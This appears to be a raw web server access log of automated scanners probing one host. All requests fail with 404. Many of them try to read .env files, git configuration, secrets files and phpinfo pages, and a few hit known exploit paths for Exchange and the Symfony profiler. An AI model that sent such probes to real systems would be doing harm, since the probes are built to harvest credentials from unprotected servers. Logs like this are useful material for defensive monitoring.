81.29.142.6 - - [11/Feb/2026:18:12:25 +0000] "GET /favicon.ico HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 YaBrowser/21.6.0.616 Yowser/2.5 Safari/537.36"
5.189.139.225 - - [11/Feb/2026:18:30:23 +0000] "GET /.env HTTP/1.1" 404 705 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/531.22.7"
77.83.39.162 - - [11/Feb/2026:18:33:34 +0000] "GET /.git/config HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36"
185.12.59.118 - - [11/Feb/2026:18:46:40 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
34.158.168.101 - - [11/Feb/2026:18:47:03 +0000] "GET /.env HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0"
40.81.230.77 - - [11/Feb/2026:18:50:27 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
40.81.230.77 - - [11/Feb/2026:18:50:27 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
5.189.139.225 - - [11/Feb/2026:19:49:44 +0000] "GET /.git/config HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
102.22.20.125 - - [11/Feb/2026:20:37:30 +0000] "GET /admin/config.php HTTP/1.0" 404 1236 "-" "xfa1,nvdorz,nvd0rz"
185.242.226.121 - - [11/Feb/2026:20:51:53 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.241.208.170 - - [11/Feb/2026:21:00:27 +0000] "GET /.git/refs/heads/ HTTP/1.1" 404 705 "-" "SEC-SGHX210/1.0 UP.Link/6.3.1.13.0"
162.243.51.145 - - [11/Feb/2026:21:04:30 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
162.243.51.145 - - [11/Feb/2026:21:04:30 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.158.168.101 - - [11/Feb/2026:21:29:19 +0000] "GET /.env HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0"
34.158.168.101 - - [11/Feb/2026:21:57:59 +0000] "GET /.env HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0"
74.249.177.110 - - [11/Feb/2026:22:13:43 +0000] "GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 705 "-" "Mozilla/5.0 zgrab/0.x"
78.153.140.50 - - [11/Feb/2026:22:26:09 +0000] "GET /.env HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.50 - - [11/Feb/2026:22:26:09 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
135.237.127.54 - - [11/Feb/2026:22:37:32 +0000] "GET /owa/auth/x.js HTTP/1.1" 404 705 "-" "Mozilla/5.0 zgrab/0.x"
216.73.163.4 - - [11/Feb/2026:22:59:40 +0000] "GET /RDWeb/Pages/ HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203"
40.119.40.156 - - [11/Feb/2026:23:01:04 +0000] "GET /developmentserver/metadatauploader HTTP/1.1" 404 705 "-" "Mozilla/5.0 zgrab/0.x"
198.235.24.3 - - [11/Feb/2026:23:09:08 +0000] "GET / HTTP/1.1" 404 705 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
43.157.188.74 - - [11/Feb/2026:23:11:35 +0000] "GET / HTTP/1.1" 404 705 "http://150.230.34.123:443" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
34.229.16.67 - - [11/Feb/2026:23:12:27 +0000] "GET /robots.txt HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
44.202.231.158 - - [11/Feb/2026:23:12:41 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
35.171.161.173 - - [11/Feb/2026:23:16:26 +0000] "GET /favicon.ico HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
144.31.4.70 - - [11/Feb/2026:23:31:48 +0000] "POST /p/u/doAuthentication.do HTTP/1.0" 404 1236 "-" "-"
78.153.140.50 - - [11/Feb/2026:23:46:32 +0000] "GET /.env HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.50 - - [11/Feb/2026:23:46:33 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
45.156.87.40 - - [11/Feb/2026:23:53:40 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
167.94.138.46 - - [11/Feb/2026:23:55:45 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.46 - - [11/Feb/2026:23:57:54 +0000] "GET /sitemap.xml HTTP/1.1" 404 705 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
87.120.191.67 - - [12/Feb/2026:00:00:43 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
78.153.140.50 - - [12/Feb/2026:00:50:06 +0000] "GET /.env HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.50 - - [12/Feb/2026:00:50:08 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
176.65.134.20 - - [12/Feb/2026:01:01:29 +0000] "PROPFIND / HTTP/1.1" 404 1236 "http://150.230.34.123:443/" "-"
147.185.133.78 - - [12/Feb/2026:01:13:17 +0000] "GET / HTTP/1.1" 404 705 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
87.120.191.67 - - [12/Feb/2026:01:49:04 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
78.153.140.250 - - [12/Feb/2026:01:50:33 +0000] "GET /.env HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.250 - - [12/Feb/2026:01:50:34 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
64.62.156.162 - - [12/Feb/2026:02:22:45 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
78.153.140.224 - - [12/Feb/2026:02:26:31 +0000] "GET /.env HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; nl-nl) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
78.153.140.224 - - [12/Feb/2026:02:26:33 +0000] "GET /api/.env HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2700.0 Safari/537.36 OPR/38.0.2213.0 (Edition developer)"
78.153.140.224 - - [12/Feb/2026:02:26:37 +0000] "GET /backend/.env HTTP/1.1" 404 1236 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)"
78.153.140.224 - - [12/Feb/2026:02:26:38 +0000] "GET /admin/.env HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows; U; Win98; fr-FR; rv:1.7.6) Gecko/20050226 Firefox/1.0.1"
78.153.140.224 - - [12/Feb/2026:02:26:39 +0000] "GET /.env.example HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2"
78.153.140.224 - - [12/Feb/2026:02:26:40 +0000] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 1236 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)"
78.153.140.224 - - [12/Feb/2026:02:26:41 +0000] "GET /?phpinfo=-1 HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0 Mobile/14B71 Safari/602.1"
78.153.140.224 - - [12/Feb/2026:02:26:42 +0000] "GET /?url=.env HTTP/1.1" 404 1236 "-" "Opera/9.80 (X11; Linux zvav; U; hu) Presto/2.8.119 Version/11.10"
78.153.140.224 - - [12/Feb/2026:02:26:43 +0000] "GET /staging/.env HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.0 (KHTML, like Gecko) Chrome/2.0.162.0 Safari/530.0"
78.153.140.224 - - [12/Feb/2026:02:26:44 +0000] "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 1236 "-" "BLU STAR4.0/V2 Linux/3.0.13 Android/4.0 Release/02.15.2012 Browser/AppleWebKit534.30 Mobile Safari/534.30 MBBMS/2.2 System/Android 4.2.2"
78.153.140.224 - - [12/Feb/2026:02:26:44 +0000] "GET /phpinfo.php HTTP/1.1" 404 1236 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
78.153.140.224 - - [12/Feb/2026:02:26:45 +0000] "GET /info/ HTTP/1.1" 404 1236 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Maxthon 2.0)"
78.153.140.224 - - [12/Feb/2026:02:26:46 +0000] "GET /app/.env HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SPH-L720T Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36"
78.153.140.224 - - [12/Feb/2026:02:26:47 +0000] "GET /phpinfo/ HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Redmi Note 4 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.109 Mobile Safari/537.36"
78.153.140.224 - - [12/Feb/2026:02:26:49 +0000] "GET /dev/.env HTTP/1.1" 404 1236 "-" "More Firefox 2.0.0.8 user agents strings -->>"
78.153.140.224 - - [12/Feb/2026:02:26:50 +0000] "GET /.env.production HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
78.153.140.224 - - [12/Feb/2026:02:26:51 +0000] "GET /.env.save HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/417.9 (KHTML, like Gecko)"
78.153.140.224 - - [12/Feb/2026:02:26:52 +0000] "GET /demo/.env HTTP/1.1" 404 1236 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; WebMoney Advisor)"
78.153.140.224 - - [12/Feb/2026:02:26:53 +0000] "GET /laravel/.env HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
78.153.140.224 - - [12/Feb/2026:02:26:56 +0000] "GET /.config.yaml HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 OPR/50.0.2762.67"
78.153.140.224 - - [12/Feb/2026:02:26:56 +0000] "GET /info HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36"
78.153.140.224 - - [12/Feb/2026:02:26:57 +0000] "GET /secrets.env HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.25 (KHTML, like Gecko) Version/11.0 Mobile/15A5304i Safari/604.1"
78.153.140.224 - - [12/Feb/2026:02:26:58 +0000] "GET /core/.env HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
78.153.140.224 - - [12/Feb/2026:02:26:59 +0000] "GET /server/.env HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 OPR/51.0.2830.55"
78.153.140.224 - - [12/Feb/2026:02:27:01 +0000] "GET /test/.env HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; es-us; ALCATEL ONE TOUCH 7042A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.2 Mobile Safari/534.30"
78.153.140.224 - - [12/Feb/2026:02:27:03 +0000] "GET /web/.env HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Linux; Android 5.0.2; vivo Y51 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36"
78.153.140.224 - - [12/Feb/2026:02:27:04 +0000] "GET /test HTTP/1.1" 404 1236 "-" "Opera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9"
78.153.140.224 - - [12/Feb/2026:02:27:06 +0000] "GET /.env.bak HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.130"
78.153.140.224 - - [12/Feb/2026:02:27:07 +0000] "GET /crm/.env HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Linux; Android 7.0; Moto G (5) Plus Build/NPNS25.137-35-5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.107 Mobile Safari/537.36"
78.153.140.224 - - [12/Feb/2026:02:27:09 +0000] "GET /config/.env HTTP/1.1" 404 1236 "-" "Opera/9.02 (X11; Linux i686; U; en)"
64.62.156.166 - - [12/Feb/2026:02:29:31 +0000] "GET /favicon.ico HTTP/1.1" 404 705 "-" "Mozilla/5.0 (iPad; CPU OS 15_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Mobile/15E148 Safari/604.1"
89.42.231.200 - - [12/Feb/2026:02:29:57 +0000] "GET /SDK/webLanguage HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
64.62.156.170 - - [12/Feb/2026:02:31:36 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
64.62.156.162 - - [12/Feb/2026:02:41:39 +0000] "GET /geoserver/web/ HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
77.83.39.162 - - [12/Feb/2026:02:49:01 +0000] "GET /.git/index HTTP/1.1" 404 705 "-" "Opera/9.80 (X11; FreeBSD 8.1-RELEASE i386; Edition Next) Presto/2.12.388 Version/12.10"
64.89.163.49 - - [12/Feb/2026:02:58:10 +0000] "GET /.git/config HTTP/1.1" 404 705 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36"
64.89.163.49 - - [12/Feb/2026:03:02:21 +0000] "GET /.git/config HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
16.144.17.106 - - [12/Feb/2026:03:33:28 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
87.120.191.67 - - [12/Feb/2026:03:47:47 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
34.158.168.101 - - [12/Feb/2026:03:48:22 +0000] "GET /.env HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0"
16.144.17.106 - - [12/Feb/2026:04:29:20 +0000] "GET / HTTP/1.1" 404 705 "-" "Opera/9.80 (Android; Opera Mini/9.0.1829/66.318; U; en) Presto/2.12.423 Version/12.16"
172.237.103.129 - - [12/Feb/2026:04:53:05 +0000] "GET / HTTP/2" 404 1236 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
185.189.182.234 - - [12/Feb/2026:04:58:26 +0000] "GET /D5nu HTTP/1.1" 404 1236 "-" "-"
87.120.191.67 - - [12/Feb/2026:05:07:20 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
34.158.168.101 - - [12/Feb/2026:05:47:53 +0000] "GET /.env HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0"
172.236.228.202 - - [12/Feb/2026:06:23:17 +0000] "GET / HTTP/1.1" 404 705 "http://150.230.34.123:443/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
187.110.164.11 - - [12/Feb/2026:06:50:41 +0000] "GET /.env HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36"
43.130.39.254 - - [12/Feb/2026:06:51:48 +0000] "GET / HTTP/1.1" 404 705 "http://150.230.34.123:443" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
87.120.191.67 - - [12/Feb/2026:07:01:56 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
185.241.208.170 - - [12/Feb/2026:07:07:07 +0000] "GET /.git/refs/remotes/ HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2"
185.242.226.121 - - [12/Feb/2026:07:19:09 +0000] "GET / HTTP/1.1" 404 705 "http://150.230.34.123:443/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
78.153.140.250 - - [12/Feb/2026:07:19:51 +0000] "GET /.env HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.250 - - [12/Feb/2026:07:19:52 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
64.89.163.49 - - [12/Feb/2026:07:25:56 +0000] "GET /.git/config HTTP/1.1" 404 705 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:31.0) Gecko/20100101 Firefox/31.0"
64.89.163.49 - - [12/Feb/2026:07:31:45 +0000] "GET /.git/config HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Linux; Android 4.3; SPH-L710 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.99 Mobile Safari/537.36"
185.242.246.128 - - [12/Feb/2026:08:18:35 +0000] "GET /remote/login?lang=en HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0 Safari/537.36"
87.120.191.67 - - [12/Feb/2026:08:51:25 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
176.65.134.20 - - [12/Feb/2026:08:56:49 +0000] "PROPFIND / HTTP/1.1" 404 1236 "http://150.230.34.123:443/" "-"
101.34.27.77 - - [12/Feb/2026:09:06:07 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) MicroMessenger Weixin QQ AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36"
101.34.27.77 - - [12/Feb/2026:09:18:09 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) MicroMessenger Weixin QQ AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36"
31.134.1.107 - - [12/Feb/2026:09:29:23 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203"
78.153.140.250 - - [12/Feb/2026:09:37:13 +0000] "GET /.env HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.250 - - [12/Feb/2026:09:37:14 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
45.82.78.105 - - [12/Feb/2026:09:54:58 +0000] "GET / HTTP/2" 404 705 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
45.131.155.111 - - [12/Feb/2026:09:55:09 +0000] "GET /favicon.ico HTTP/2" 404 705 "https://150.230.34.123/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0"
196.118.183.161 - - [12/Feb/2026:10:11:13 +0000] "GET /.env HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
196.118.183.161 - - [12/Feb/2026:10:11:14 +0000] "GET /.env_ci HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
199.45.155.109 - - [12/Feb/2026:10:36:33 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.155.109 - - [12/Feb/2026:10:36:48 +0000] "GET /login HTTP/1.1" 404 705 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
77.83.39.162 - - [12/Feb/2026:11:02:54 +0000] "GET /.git/HEAD HTTP/1.1" 404 705 "-" "Mozilla/5.0 (BlackBerry; U; BlackBerry 9930; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.267 Mobile Safari/534.11+"
78.153.140.250 - - [12/Feb/2026:11:03:56 +0000] "GET /.env HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.250 - - [12/Feb/2026:11:03:57 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
20.150.192.39 - - [12/Feb/2026:11:14:25 +0000] "GET /version HTTP/1.1" 404 705 "-" "Mozilla/5.0 zgrab/0.x"
103.216.124.169 - - [12/Feb/2026:11:15:03 +0000] "GET / HTTP/1.1" 404 705 "https://150.230.34.123" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.216.124.169 - - [12/Feb/2026:11:15:03 +0000] "GET /favicon.ico HTTP/1.1" 404 705 "https://150.230.34.123" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.216.124.169 - - [12/Feb/2026:11:15:05 +0000] "GET / HTTP/1.1" 404 705 "https://150.230.34.123" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.15"
103.216.124.169 - - [12/Feb/2026:11:15:05 +0000] "GET /favicon.ico HTTP/1.1" 404 705 "https://150.230.34.123" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.15"
45.135.193.11 - - [12/Feb/2026:12:16:08 +0000] "GET / HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xe2\x80\x94 submit exclusion requests at the linked URL)"
89.42.231.200 - - [12/Feb/2026:12:59:24 +0000] "GET /SDK/webLanguage HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
